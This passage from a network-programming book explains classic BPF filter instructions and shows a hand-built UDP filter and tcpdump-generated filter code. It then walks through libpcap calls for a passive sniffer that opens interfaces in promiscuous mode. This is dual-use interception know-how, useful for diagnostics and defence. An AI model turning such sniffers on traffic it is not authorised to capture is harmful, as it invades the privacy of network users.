The BPF_STX instruction stores the value in the index register in memory:

BPF_STX    M[k] <- X

The address of the memory cell is specified by the k value.

BPF_ALU

The BPF_ALU instruction performs arithmetic and logic operations on the value in the
accumulator and in the index register or on the value in the accumulator and a constant; it stores
the result in the accumulator. The following are examples of using this instruction:

BPF_ALU + BPF_ADD + BPF_K    A <- A + k
BPF_ALU + BPF_SUB + BPF_K    A <- A - k
BPF_ALU + BPF_MUL + BPF_K    A <- A * k
BPF_ALU + BPF_DIV + BPF_K    A <- A / k
BPF_ALU + BPF_AND + BPF_K    A <- A & k
BPF_ALU + BPF_OR + BPF_K     A <- A | k
BPF_ALU + BPF_LSH + BPF_K    A <- A << k
BPF_ALU + BPF_RSH + BPF_K    A <- A >> k
BPF_ALU + BPF_ADD + BPF_X    A <- A + X
BPF_ALU + BPF_SUB + BPF_X    A <- A - X
BPF_ALU + BPF_MUL + BPF_X    A <- A * X
BPF_ALU + BPF_DIV + BPF_X    A <- A / X
BPF_ALU + BPF_AND + BPF_X    A <- A & X
BPF_ALU + BPF_OR + BPF_X     A <- A | X
BPF_ALU + BPF_LSH + BPF_X    A <- A << X
BPF_ALU + BPF_RSH + BPF_X    A <- A >> X
BPF_ALU + BPF_NEG            A <- -A
BPF_JMP 


The BPF_JMP instruction changes the execution order of a filtration program. The instruction
can perform both conditional (BPF_JGT, BPF_JGE, BPF_JEQ, and BPF_JSET) and unconditional
(BPF_JA) jumps. For conditional jumps, the value in the accumulator is compared to the k constant
(BPF_K) or the value in the index register (BPF_X). For unconditional jumps, the offset is specified
by a 32-bit value; for conditional ones, it is specified by an 8-bit value. The offset is the
number of instructions that the filtration program must skip, counted from the instruction that
follows the jump. Consequently, the longest conditional jump is 2^8 - 1 = 255 instructions.

The following are examples of using this instruction. 

An unconditional jump is made to the offset specified by the 32-bit k value:

BPF_JMP + BPF_JA               pc += k

The values in the accumulator and the k constant are compared. A conditional jump to
the offset specified in the jt field is performed if the A > k condition is satisfied;
otherwise, the jump is made to the offset specified in the jf field:

BPF_JMP + BPF_JGT + BPF_K      pc += (A > k) ? jt : jf

A few more examples:

BPF_JMP + BPF_JGE + BPF_K      pc += (A >= k) ? jt : jf
BPF_JMP + BPF_JEQ + BPF_K      pc += (A == k) ? jt : jf
BPF_JMP + BPF_JSET + BPF_K     pc += (A & k) ? jt : jf
BPF_JMP + BPF_JGT + BPF_X      pc += (A > X) ? jt : jf
BPF_JMP + BPF_JGE + BPF_X      pc += (A >= X) ? jt : jf
BPF_JMP + BPF_JEQ + BPF_X      pc += (A == X) ? jt : jf
BPF_JMP + BPF_JSET + BPF_X     pc += (A & X) ? jt : jf


BPF_RET 

The result of the filter's operation is a nonnegative integer, which specifies the number of bytes
in the received packet that will be available to the user application for further processing.
If the received packet does not meet the filtration conditions, the filtration program discards it
by returning 0. The BPF_RET instruction terminates execution of the filtration program
and returns the number of bytes in the packet available for further processing.

The following instruction returns the value in the accumulator:

BPF_RET + BPF_A

The following instruction returns a constant (the k value):

BPF_RET + BPF_K

BPF_MISC

The BPF_MISC instruction copies the value in the index register to the accumulator, and
vice versa:

BPF_MISC + BPF_TAX    X <- A
BPF_MISC + BPF_TXA    A <- X
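To make the semantics of the load modes, the jt/jf offsets, and BPF_RET concrete, here is a minimal user-space interpreter for a subset of the instruction set. It is a hypothetical sketch, not the kernel's implementation: it uses Linux's struct sock_filter and the BPF_* constants from <linux/filter.h> instead of <net/bpf.h>, and it deliberately leaves out BPF_ALU, BPF_ST/BPF_STX, and memory cells.

```c
#include <stddef.h>
#include <stdint.h>
#include <linux/filter.h>   /* struct sock_filter, BPF_* codes, BPF_STMT, BPF_JUMP */

/* Reads size bytes at offset off in network byte order; -1 if out of range. */
static int bpf_fetch(const unsigned char *p, size_t len, uint32_t off,
                     size_t size, uint32_t *v)
{
    size_t i;

    if (off > len || size > len - off)
        return -1;
    for (*v = 0, i = 0; i < size; i++)
        *v = (*v << 8) | p[off + i];
    return 0;
}

/* Hypothetical interpreter for LD (IMM, LEN, ABS, IND), LDX (IMM, MSH),
   JMP, RET, and MISC. Returns the verdict: bytes to accept, 0 = reject. */
uint32_t bpf_run(const struct sock_filter *prog, size_t n,
                 const unsigned char *p, size_t len)
{
    uint32_t A = 0, X = 0, v, operand;
    size_t pc = 0, size;

    while (pc < n) {
        const struct sock_filter *f = &prog[pc++];

        switch (BPF_CLASS(f->code)) {
        case BPF_LD:
            switch (BPF_MODE(f->code)) {
            case BPF_IMM: A = f->k; break;
            case BPF_LEN: A = (uint32_t) len; break;
            case BPF_ABS:
            case BPF_IND:
                size = BPF_SIZE(f->code) == BPF_W ? 4 :
                       BPF_SIZE(f->code) == BPF_H ? 2 :
                       BPF_SIZE(f->code) == BPF_B ? 1 : 0;
                if (size == 0 ||
                    bpf_fetch(p, len, (BPF_MODE(f->code) == BPF_IND ? X : 0) + f->k,
                              size, &A) < 0)
                    return 0;           /* bad size or out-of-bounds load: reject */
                break;
            default:
                return 0;               /* BPF_MEM is not supported here */
            }
            break;
        case BPF_LDX:
            if (BPF_MODE(f->code) == BPF_IMM) {
                X = f->k;
            } else if (BPF_MODE(f->code) == BPF_MSH) {
                if (bpf_fetch(p, len, f->k, 1, &v) < 0)
                    return 0;
                X = 4 * (v & 0x0f);     /* IP header length in bytes */
            } else {
                return 0;               /* LEN and MEM modes omitted */
            }
            break;
        case BPF_JMP:
            operand = BPF_SRC(f->code) == BPF_X ? X : f->k;
            switch (BPF_OP(f->code)) {
            case BPF_JA:   pc += f->k; continue;
            case BPF_JEQ:  v = (A == operand); break;
            case BPF_JGT:  v = (A > operand); break;
            case BPF_JGE:  v = (A >= operand); break;
            case BPF_JSET: v = (A & operand) != 0; break;
            default:       return 0;
            }
            pc += v ? f->jt : f->jf;    /* offsets count from the next instruction */
            break;
        case BPF_RET:
            return BPF_RVAL(f->code) == BPF_A ? A : f->k;
        case BPF_MISC:
            if (BPF_MISCOP(f->code) == BPF_TAX)
                X = A;
            else if (BPF_MISCOP(f->code) == BPF_TXA)
                A = X;
            else
                return 0;
            break;
        default:
            return 0;                   /* instruction outside this subset */
        }
    }
    return 0;                           /* ran off the end: reject */
}
```

For instance, a small filter that accepts only IPv4 UDP packets addressed to port 80 can be run on a hand-made frame this way to check its jump offsets before it is attached to a socket.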
9.1.1.2. A Packet Filter Example Program


As an example, consider a filter that accepts only UDP packets with the 192.168.10.130:777 
source address and port and the 192.168.10.1:80 destination address and port. 
To be able to use a BPF in the program, only one header file must be included: 


#include <net/bpf.h> 


In many UNIX systems, to obtain access to a BPF, a special character device that is not being
used by another process (/dev/bpf0, /dev/bpf1, etc.) must be opened using the open()
function. Then the device's properties must be set by executing a series of
ioctl() function calls.

None of this has to be done in Linux. Simply define the necessary structures and variables, 
write a filtration program, and connect it to a socket. 

For the program, a variable (call it bp) of the bpf_program structure type must be defined:

struct bpf_program bp;

The following is the definition of this structure as given in the /net/bpf.h header file:

struct bpf_program {
    u_short bf_len;               // Number of structures in the array
    struct bpf_insn *bf_insns;    // Pointer to the bpf_insn array of structures
};

After the filtration program is constructed, the structure's fields will have to be filled.
The bf_insns field stores a pointer to the filtration program, which is an array of
struct bpf_insn structures; the bf_len field stores the number of structures in the array.

Listing 9.3 shows the commented source code for the filtration program. 





Listing 9.3. The filtration program 





struct bpf_insn filter_app[] = {

/* Loading into the accumulator the 2 bytes at offset 12 from the beginning of the
Ethernet header of the received packet. These bytes contain the identifier of the
network layer protocol. */
BPF_STMT(BPF_LD + BPF_H + BPF_ABS, 12),

/* Comparing the value in the accumulator with the IP identifier (ETH_P_IP = 0x800).
If the condition is satisfied, jump to the next instruction (jt = 0); otherwise, jump
12 structures lower (jf = 12) and leave the filtration program, returning a zero value.
This means that the given packet has been rejected. */
BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, ETH_P_IP, 0, 12),

/* Loading 1 byte at offset 23 into the accumulator. This field holds the identifier of
the transport layer protocol. For UDP, this value is 17. */
BPF_STMT(BPF_LD + BPF_B + BPF_ABS, 23),

/* Checking whether the value corresponds to the necessary transport protocol.
If the condition is satisfied, jump to the next instruction (jt = 0); otherwise, jump
10 structures lower (jf = 10) and leave the filtration program, returning a zero value. */
BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, IPPROTO_UDP, 0, 10),

/* Loading a 4-byte value at offset 26 in the received packet into the accumulator.
This value is the source IP address. */
BPF_STMT(BPF_LD + BPF_W + BPF_ABS, 26),

/* Comparing the value in the accumulator with IP address 192.168.10.130. The value
0xc0a80a82 is this address written in network (big-endian) byte order, which is how
BPF interprets a word loaded from the packet. If the address does not match, exit the
filtration program. */
BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0xc0a80a82, 0, 8),

/* Loading the destination IP address, which is at offset 30, and comparing it with
address 192.168.10.1 (0xc0a80a01). If the addresses do not match, exit the filtration
program. */
BPF_STMT(BPF_LD + BPF_W + BPF_ABS, 30),
BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0xc0a80a01, 0, 6),

/* Checking whether the Source port field is 777 (0x309). First, the IP header length
must be determined: X = 4 * (byte at offset 14 & 0x0f). */
BPF_STMT(BPF_LDX + BPF_B + BPF_MSH, 14),

/* The IP header length is now in the index register. The Source port field is at the
offset equal to the sum of the lengths of the Ethernet header (14) and the IP header (X).
Loading it into the accumulator. */
BPF_STMT(BPF_LD + BPF_H + BPF_IND, 14),

/* Checking the obtained value. */
BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0x309, 0, 3),

/* Loading the Destination port field (2 bytes after the Source port) and checking
whether it is 80 (0x50). */
BPF_STMT(BPF_LD + BPF_H + BPF_IND, 16),
BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0x50, 0, 1),

/* Exiting the filtration program: accept up to 1500 bytes of a matching packet,
or return 0 to reject the packet */
BPF_STMT(BPF_RET + BPF_K, 1500),
BPF_STMT(BPF_RET + BPF_K, 0),
};
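To see how the jump offsets in Listing 9.3 work out, the following sketch interprets only the subset of classic BPF that the listing uses: absolute and indexed loads, BPF_LDX with BPF_MSH, BPF_JEQ against a constant, and BPF_RET. The function is a simplified user-space model, not the kernel's implementation, and the name run_filter() is hypothetical. It takes its instruction type and macros from the Linux header <linux/filter.h>, whose struct sock_filter has the same code, jt, jf, and k fields as struct bpf_insn.

```c
#include <stddef.h>
#include <stdint.h>
#include <linux/filter.h>

/* Hypothetical mini-interpreter for the classic BPF subset used in
 * Listing 9.3. Returns the value of the RET instruction that is reached,
 * or 0 (reject) for an unsupported opcode, an out-of-bounds read, or
 * running off the end of the program. */
uint32_t run_filter(const struct sock_filter *prog, size_t n,
                    const uint8_t *pkt, size_t len)
{
    uint32_t a = 0, x = 0;   /* accumulator and index register */

    for (size_t pc = 0; pc < n; pc++) {
        const struct sock_filter *f = &prog[pc];
        uint32_t off;

        switch (BPF_CLASS(f->code)) {
        case BPF_LD:
            if (BPF_MODE(f->code) == BPF_ABS)
                off = f->k;                 /* offset from packet start */
            else if (BPF_MODE(f->code) == BPF_IND)
                off = x + f->k;             /* offset relative to X */
            else
                return 0;
            /* Multi-byte loads read the bytes in network (big-endian) order */
            switch (BPF_SIZE(f->code)) {
            case BPF_B:
                if ((size_t)off + 1 > len) return 0;
                a = pkt[off];
                break;
            case BPF_H:
                if ((size_t)off + 2 > len) return 0;
                a = (uint32_t)pkt[off] << 8 | pkt[off + 1];
                break;
            case BPF_W:
                if ((size_t)off + 4 > len) return 0;
                a = (uint32_t)pkt[off] << 24 | (uint32_t)pkt[off + 1] << 16 |
                    (uint32_t)pkt[off + 2] << 8 | pkt[off + 3];
                break;
            default:
                return 0;
            }
            break;
        case BPF_LDX:
            /* BPF_MSH: X = 4 * (low nibble of byte k), i.e. the IP header length */
            if (BPF_MODE(f->code) != BPF_MSH || (size_t)f->k >= len) return 0;
            x = 4u * (pkt[f->k] & 0x0f);
            break;
        case BPF_JMP:
            if (BPF_OP(f->code) != BPF_JEQ || BPF_SRC(f->code) != BPF_K) return 0;
            pc += (a == f->k) ? f->jt : f->jf;   /* the loop adds the usual +1 */
            break;
        case BPF_RET:
            return BPF_RVAL(f->code) == BPF_K ? f->k : a;
        default:
            return 0;
        }
    }
    return 0;
}
```

Given a 42-byte frame that carries a UDP datagram from 192.168.10.130:777 to 192.168.10.1:80, the Listing 9.3 program reaches BPF_RET with 1500. If any checked field is changed, or the frame is too short to hold a field the program reads, the result is 0.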





Now that the filtration program has been put together, fill in the fields of the struct bpf_program bp structure:

bp.bf_len = 15;            // Number of structures in the filtration program
bp.bf_insns = filter_app;  // Pointer to the filtration program

The last step in getting the filter to work is to attach it to a socket by calling the setsockopt() function as follows:

if (setsockopt(sd, SOL_SOCKET, SO_ATTACH_FILTER, &bp, sizeof(bp)) < 0) {
    perror("SO_ATTACH_FILTER");
    close(sd);
    exit(-1);
}
Although the filtration program works as intended, it has one serious shortcoming: the source data (i.e., IP addresses and port numbers) are hard-coded in the program's source code. As a result, every time the filtration conditions change, the source code has to be modified and the program recompiled.

This can be fixed by specifying the IP addresses and port numbers in the command line when the sniffer is started. To do this, the fields that contain IP addresses and port numbers are zeroed out in the filtration program:

BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0, 0, 8),  // 6th element
BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0, 0, 6),  // 8th element
BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0, 0, 3),  // 11th element
BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0, 0, 1),  // 13th element


Now, these fields are filled using the following statements:

filter_app[5].k = __swab32(source_ip);
filter_app[7].k = __swab32(dest_ip);
filter_app[10].k = sport;
filter_app[12].k = dport;

The replacement values are taken from the command line:

source_ip = inet_addr(argv[1]);
sport = atoi(argv[2]);
dest_ip = inet_addr(argv[3]);
dport = atoi(argv[4]);


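The __swab32() macro reverses the byte order of the value returned by inet_addr(), which is already in network byte order. A BPF load instruction reads the address bytes in network order, producing the number 0xc0a80a82 for 192.168.10.130. On a little-endian host, such as x86, the byte swap therefore yields exactly the constant the filter compares against. The ntohl() function does the same job portably and also works on big-endian hosts. The __swab32() macro is defined in the linux/byteorder/swab.h header file.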
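A sketch of the same patching step, collected in one hypothetical helper, set_filter_params(), appears below. It makes two substitutions, both assumptions of this sketch and not the book's code. It uses inet_pton() in place of inet_addr(), so that malformed addresses are detected. It uses ntohl() in place of __swab32(), so that it also works on big-endian hosts. The instruction indexes are the 6th, 8th, 11th, and 13th elements named in the text.

```c
#include <arpa/inet.h>
#include <linux/filter.h>

/* Positions of the zeroed placeholders in the Listing 9.3 layout */
enum { SRC_IP_INSN = 5, DST_IP_INSN = 7, SRC_PORT_INSN = 10, DST_PORT_INSN = 12 };

/* Hypothetical helper: fills the placeholders of a Listing 9.3-style filter.
 * A BPF word load yields the address as a host-order number, so the
 * network-order address produced by inet_pton() is passed through ntohl().
 * Returns 0 on success, -1 for an invalid address or port. */
int set_filter_params(struct sock_filter *f, const char *src_ip, int sport,
                      const char *dst_ip, int dport)
{
    struct in_addr src, dst;

    if (inet_pton(AF_INET, src_ip, &src) != 1 ||
        inet_pton(AF_INET, dst_ip, &dst) != 1)
        return -1;
    if (sport < 0 || sport > 65535 || dport < 0 || dport > 65535)
        return -1;

    f[SRC_IP_INSN].k = ntohl(src.s_addr);
    f[DST_IP_INSN].k = ntohl(dst.s_addr);
    f[SRC_PORT_INSN].k = (unsigned int)sport;   /* ports are compared as plain numbers */
    f[DST_PORT_INSN].k = (unsigned int)dport;
    return 0;
}
```

In the sniffer's main(), the call would be set_filter_params(filter_app, argv[1], atoi(argv[2]), argv[3], atoi(argv[4])). Check the return value for -1 before the filter is attached.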

The tcpdump utility can be helpful in putting together the filtration program. When run with 
the -d option, the utility dumps the filtration program code, showing command names and 
numbering the output lines. The -dd option dumps the filtration program code as a C program 
fragment. The -ddd option dumps the filtration program code as decimal numbers. 

Here's an example: 

# tcpdump -dd udp and src host 192.168.10.130 and src port 777 and dst host 192.168.10.1 and dst port 80
{ 0x28, 0, 0, 0xfffff000 },
{ 0x15, 0, 14, 0x00000800 },
{ 0x30, 0, 0, 0x00000009 },
{ 0x15, 0, 12, 0x00000011 },
{ 0x20, 0, 0, 0x0000000c },
{ 0x15, 0, 10, 0xc0a80a82 },
{ 0x28, 0, 0, 0x00000006 },
{ 0x45, 8, 0, 0x00001fff },
{ 0xb1, 0, 0, 0x00000000 },
{ 0x48, 0, 0, 0x00000000 },
{ 0x15, 0, 5, 0x00000309 },
{ 0x20, 0, 0, 0x00000010 },
{ 0x15, 0, 3, 0xc0a80a01 },
{ 0x48, 0, 0, 0x00000002 },
{ 0x15, 0, 1, 0x00000050 },
{ 0x6, 0, 0, 0x0000ffff },
{ 0x6, 0, 0, 0x00000000 },
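When you write a filter by hand, it can help to print it in the same layout as the tcpdump -dd output above and compare the two line by line. The sketch below is a hypothetical pair of helpers, format_insn() and dump_filter(). The exact spacing is copied from the dump shown above, and the instruction type is Linux's struct sock_filter from <linux/filter.h>.

```c
#include <stdio.h>
#include <linux/filter.h>

/* Hypothetical helper: formats one instruction as "{ code, jt, jf, k },"
 * in the style of tcpdump -dd. Returns the snprintf() result. */
int format_insn(char *buf, size_t size, const struct sock_filter *insn)
{
    return snprintf(buf, size, "{ 0x%x, %u, %u, 0x%08x },",
                    (unsigned)insn->code, (unsigned)insn->jt,
                    (unsigned)insn->jf, (unsigned)insn->k);
}

/* Prints a whole program to stdout, one instruction per line */
void dump_filter(const struct sock_filter *prog, size_t count)
{
    char line[64];

    for (size_t i = 0; i < count; i++) {
        format_insn(line, sizeof(line), &prog[i]);
        puts(line);
    }
}
```

For example, the first instruction of Listing 9.3, BPF_STMT(BPF_LD + BPF_H + BPF_ABS, 12), prints as { 0x28, 0, 0, 0x0000000c },. The opcode matches tcpdump's, but the offset differs from the first line of the dump above.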


The source code for the passive sniffer using BPF, named sklsniff_bpf.c, can be found in 
the /PART II/Chapter 9 directory on the accompanying CD-ROM. 
9.1.2. A Sniffer Using the libpcap Library


Developing a filtration program using BPF is a difficult undertaking. The task of program- 
ming sniffers in general and of creating filters in particular is made significantly easier by using 
the libpcap packet capture library, created by Van Jacobson, Craig Leres, and Steve McCanne. 
The libpcap library is used by many well-known utilities, for example, the tcpdump and Ettercap network traffic analyzers and the Snort intrusion detection and prevention system.

Versions of libpcap exist for many other operating systems, including Windows, so the library can be used to create portable applications.

The latest version of the libpcap library can be found at http://www.tcpdump.org. The library also comes with most Linux distributions.

Programs developed using libpcap must have root privileges or the SUID bit set. 

The typical sequence of steps that a program using the libpcap library must perform to 
get its job done is the following: 


1. Identify the network interface.
2. Open a network interface and create an intercept session.
3. Create a filter if necessary.
4. Capture and process packets.
5. Close the intercept session.


A detailed description of each step follows. 


9.1.2.1. Identifying the Network Interface 


There are three main methods for identifying the network interface to listen on. In the first method, the libpcap library is not used and the name of the interface is hard-coded in the program. This method was already used in previous programs:

#define DEVICE "eth0"

The interface name can also be passed to the program in the command line by the user.

The second method uses the pcap_lookupdev() function from the libpcap library:


#include <pcap.h>

char *dev;
char errbuf[PCAP_ERRBUF_SIZE];

dev = pcap_lookupdev(errbuf);
if (dev == NULL) {
    fprintf(stderr, "%s", errbuf);
    exit(-1);
}

In this case, the dev variable will be set to the name of a suitable interface. If the pcap_lookupdev() function generates an error, its description is placed in the errbuf buffer. The prototype of the pcap_lookupdev() function has the following form:

char *pcap_lookupdev(char *errbuf)

Programs that use the libpcap library must include the pcap.h header file.

In the third method, the user can select an interface from a list. This list is prepared using the pcap_findalldevs() function from the libpcap library:

#include <pcap.h>

pcap_if_t *alldevsp, *d;
char errbuf[PCAP_ERRBUF_SIZE];

if (pcap_findalldevs(&alldevsp, errbuf) < 0) {
    fprintf(stderr, "%s", errbuf);
    exit(-1);
}
for (d = alldevsp; d != NULL; d = d->next)  /* keep alldevsp to free the list */
    printf("%s\n", d->name);
pcap_freealldevs(alldevsp);

The pcap_findalldevs() function takes the address of a pcap_if_t pointer and stores in it a linked list with information about the interfaces found. If the pcap_findalldevs() function generates an error, its description is placed in the errbuf buffer.

The pcap_if_t type (a typedef for struct pcap_if) is a structure containing a wealth of useful information:

typedef struct pcap_if pcap_if_t;
struct pcap_if {
    struct pcap_if *next;        /* Pointer to the next list item */
    char *name;                  /* Name of the interface */
    char *description;           /* Textual description of the interface or NULL */
    struct pcap_addr *addresses; /* IP address, network mask, broadcast address, etc. */
    bpf_u_int32 flags;           /* PCAP_IF_LOOPBACK is set for the loopback interface */
};

The addresses item is a pointer to the pcap_addr structure, which contains additional information about the interface:

struct pcap_addr {
    struct pcap_addr *next;      /* Pointer to the next list item */
    struct sockaddr *addr;       /* IP address */
    struct sockaddr *netmask;    /* Network mask for this IP address */
    struct sockaddr *broadaddr;  /* Broadcast address */
    struct sockaddr *dstaddr;    /* Destination address for a point-to-point connection or NULL */
};

The prototype of the pcap_findalldevs() function has the following form:

int pcap_findalldevs(pcap_if_t **alldevsp, char *errbuf)


Note that older versions of the libpcap library do not have the pcap_findalldevs() function.


9.1.2.2. Opening the Network Interface and Creating an Intercept Session 


The pcap_open_live() function opens a network interface and creates an intercept session. Its prototype has the following form:

pcap_t *pcap_open_live(const char *device, int snaplen, int promisc, int to_ms, char *errbuf)

Its parameters are as follows:

❑ device: The interface name determined in the first step
❑ snaplen: An integer specifying the maximum number of bytes of each network packet that the library will capture
❑ promisc: The flag that switches the interface into promiscuous mode (1 for set and 0 for not set)
❑ to_ms: The read timeout in milliseconds (0 means no timeout, so a read can block until packets arrive)
❑ errbuf: A buffer to hold error messages


The function returns a session descriptor, or NULL if an error occurs. The following is a sample code fragment:

#include <pcap.h>

pcap_t *handle;
char errbuf[PCAP_ERRBUF_SIZE];

errbuf[0] = '\0';   /* Cleared so that a warning can be detected after the call */
handle = pcap_open_live(dev, BUFSIZ, 1, 0, errbuf);
if (handle == NULL) {
    fprintf(stderr, "%s", errbuf);
    exit(-1);
}
if (strlen(errbuf) > 0) {
    fprintf(stderr, "Warning: %s", errbuf);
    errbuf[0] = 0;
}

Here, the interface whose name is specified in the dev variable is opened, and the number of bytes to capture from each packet is specified (the BUFSIZ constant is defined in the stdio.h header file, which pcap.h includes). The network interface is switched into promiscuous mode, and no read timeout is set.

As soon as an intercept session is opened and a descriptor is received, numerous properties can be determined and set before the packet interception process starts. For example, the type of the opened interface can be determined using the pcap_datalink() function:

if (pcap_datalink(handle) != DLT_EN10MB) {
    fprintf(stderr, "This program only works with Ethernet cards!\n");
    exit(-1);
}

This code generates an error if the selected network interface is not an Ethernet interface. DLT_EN10MB is used for Ethernet at any speed: 10 Mbit/s, 100 Mbit/s, 1,000 Mbit/s, or higher. This check is not mandatory, but it can be useful.


9.1.2.3. Creating a Filter 


A filter is added to the program using two main functions: pcap_compile() and pcap_setfilter().

The filter expression is stored in a regular string (a character array). The syntax of such expressions is the same as the syntax used by the tcpdump utility.

Before the filter can be used, it must be "compiled," which is done using the pcap_compile() function. Its prototype has the following form:

int pcap_compile(pcap_t *p, struct bpf_program *fp, char *str, int optimize, bpf_u_int32 netmask)

Here, the first argument is the descriptor of the open session. The second argument is a pointer to the memory area in which the compiled filter will be stored. It is followed by the filter expression in a regular string. The next parameter specifies whether the expression should be optimized: 0 for no and 1 for yes. The last parameter is the mask of the network on which the filter is to be used. The function returns -1 in case of an error. Any other value indicates successful execution.

After the expression is "compiled," it must be applied, which is done using the pcap_setfilter() function. Its prototype has the following form:

int pcap_setfilter(pcap_t *p, struct bpf_program *fp)

Here, the first argument is the descriptor of the open session, and the second is a pointer to the "compiled" filter expression (as a rule, this is the second argument of the pcap_compile() function).

The following is a sample code fragment: 

#include <pcap.h>

pcap_t *handle;                        /* Session descriptor */
char dev[] = "eth0";                   /* Network interface to eavesdrop on */
char errbuf[PCAP_ERRBUF_SIZE];         /* Buffer for error descriptions */
struct bpf_program filter;             /* Compiled filter expression */
char filter_app[] = "udp dst port 53"; /* The filter expression */
bpf_u_int32 mask;                      /* Network mask of the interface */
bpf_u_int32 net;                       /* Network address of the interface */

if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {
    fprintf(stderr, "%s", errbuf);
    exit(-1);
}

errbuf[0] = '\0';
handle = pcap_open_live(dev, BUFSIZ, 1, 0, errbuf);
if (handle == NULL) {
    fprintf(stderr, "%s", errbuf);
    exit(-1);
}
if (strlen(errbuf) > 0) {
    fprintf(stderr, "Warning: %s", errbuf);
    errbuf[0] = 0;
}

if (pcap_compile(handle, &filter, filter_app, 0, mask) == -1) {
    fprintf(stderr, "%s", pcap_geterr(handle));
    exit(-1);
}
if (pcap_setfilter(handle, &filter) == -1) {
    fprintf(stderr, "%s", pcap_geterr(handle));
    exit(-1);
}

This fragment prepares the interception of UDP packets addressed to port 53.

The example contains two functions that have not been considered yet: pcap_lookupnet() and pcap_geterr().

The first function determines the network mask, which is then passed as the last parameter of the pcap_compile() function. The function returns -1 in case of an error. Its prototype has the following form:

int pcap_lookupnet(const char *device, bpf_u_int32 *netp, bpf_u_int32 *maskp, char *errbuf)

Only the network mask is needed here. The network address, which the function also returns, is obtained just to give the complete picture.

The pcap_geterr() function returns the description of the last error. It accepts the descriptor of the open session as its parameter. The following is its prototype:

char *pcap_geterr(pcap_t *p)


9.1.2.4. Capturing and Processing Packets 


Packets can be captured using one of four functions: pcap_next(), pcap_next_ex(), pcap_dispatch(), or pcap_loop().

The first two functions capture a single packet per call. The following are their prototypes:

const u_char *pcap_next(pcap_t *p, struct pcap_pkthdr *h)

int pcap_next_ex(pcap_t *p, struct pcap_pkthdr **pkt_header, const u_char **pkt_data)

The first argument in both functions is the descriptor of the open session. The second argument describes the received packet: pcap_next() fills in the structure it points to, and pcap_next_ex() returns a pointer to such a structure through it. (The structure's description is given later in this section.) The third argument (in the second function only) is the address of a pointer through which the location of the received packet data is returned.

The first function returns a pointer to the memory area where the received packet is stored, or NULL if no packet was read. The second function returns one of the following values: 1 if the packet was read, 0 if the timeout expired, -1 if an error occurred, or -2 if the packets were being read from a file and no more packets are available.
Calling either of these two functions in a loop provides a mechanism for intercepting the necessary number of packets. A more convenient solution, however, is to use the pcap_loop() or the pcap_dispatch() function. The prototypes of these two functions are virtually identical:

int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user)

int pcap_dispatch(pcap_t *p, int cnt, pcap_handler callback, u_char *user)

Here, the first argument is the descriptor of the open session. The second argument is an integer specifying the number of packets to intercept (-1 means that packets must be intercepted until an error occurs). The third argument is the name of a callback function, which the libpcap library calls automatically every time a packet arrives. The last argument can be used to pass some data to the callback function, or it is set to NULL.

The pcap_loop() function returns 0 if cnt packets have been intercepted, -1 if an error occurred, and -2 if the loop was terminated by the pcap_breakloop() function (the latter is available only in newer versions of the libpcap library). The pcap_dispatch() function returns the same -1 and -2 codes, but on success it returns the number of packets processed.

The main difference between these two functions is in how they handle the timeout, whose value is specified when the pcap_open_live() function is called. The pcap_loop() function ignores timeouts and keeps reading, whereas the pcap_dispatch() function returns when the timeout expires. You can learn more about these functions in man pcap. Later examples use only the pcap_loop() function, because timeouts are of no interest here.

The callback function cannot have an arbitrary format. It must follow this prototype:

void process_packet(u_char *user, const struct pcap_pkthdr *header, const u_char *packet)

Here, the first argument is a pointer to the data passed to the callback function in the last argument of the pcap_loop() function. The second argument is a pointer to the pcap_pkthdr structure, which describes the captured packet. This structure is defined in pcap.h as follows:

struct pcap_pkthdr {
    struct timeval ts;    /* Time stamp */
    bpf_u_int32 caplen;   /* Length of the captured data */
    bpf_u_int32 len;      /* Length of this packet */
};

The last argument points to the buffer in which the pcap_loop() function stores the captured packet data (header->caplen bytes, which can be fewer than header->len if the snaplen is smaller than the packet). The callback function doesn't return a value (void).

The purpose of the callback function is to process the received packets. This is done in exactly the same way as in the examples that do not use the libpcap library: the necessary network packet header structures are defined, a received packet is parsed into these structures, and the field values are output to the screen.
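As a sketch of such processing, the following hypothetical helper, describe_packet(), parses an Ethernet frame that carries IPv4. It uses the Linux header structures struct ether_header (from <net/ethernet.h>) and struct iphdr (from <netinet/ip.h>). A callback would call it with header->caplen as the length, because only caplen bytes were actually captured. It copies the headers out of the buffer instead of casting pointers into it, which avoids misaligned access.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <netinet/ip.h>

/* Hypothetical helper: for an Ethernet/IPv4 frame, writes
 * "src -> dst proto N" into out and returns 0; returns -1 if the frame
 * is not IPv4 or fewer than caplen bytes of headers were captured. */
int describe_packet(const unsigned char *packet, size_t caplen,
                    char *out, size_t outlen)
{
    struct ether_header eth;
    struct iphdr ip;
    char src[INET_ADDRSTRLEN], dst[INET_ADDRSTRLEN];

    if (caplen < sizeof(eth) + sizeof(ip))
        return -1;
    memcpy(&eth, packet, sizeof(eth));
    if (ntohs(eth.ether_type) != ETHERTYPE_IP)
        return -1;
    memcpy(&ip, packet + sizeof(eth), sizeof(ip));
    if (ip.version != 4)
        return -1;
    inet_ntop(AF_INET, &ip.saddr, src, sizeof(src));
    inet_ntop(AF_INET, &ip.daddr, dst, sizeof(dst));
    snprintf(out, outlen, "%s -> %s proto %u", src, dst, (unsigned)ip.protocol);
    return 0;
}
```

Inside the callback, the call would look like describe_packet(packet, header->caplen, line, sizeof(line)), followed by printing line when the result is 0.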


9.1.2.5. Closing the Intercept Session 


An intercept session is closed using the pcap_close() function. The following is its prototype: 
void pcap_close(pcap_t *p)
The function’s only argument is the descriptor of the session that has to be closed. 
The source code for the passive sniffer using the libpcap library, named sklsniff_pcap.c, can be found in the /PART II/Chapter 9 directory on the accompanying CD-ROM.

Programs using the libpcap library are compiled with the -lpcap option:

# gcc sklsniff_pcap.c -o sklsniff_pcap -lpcap

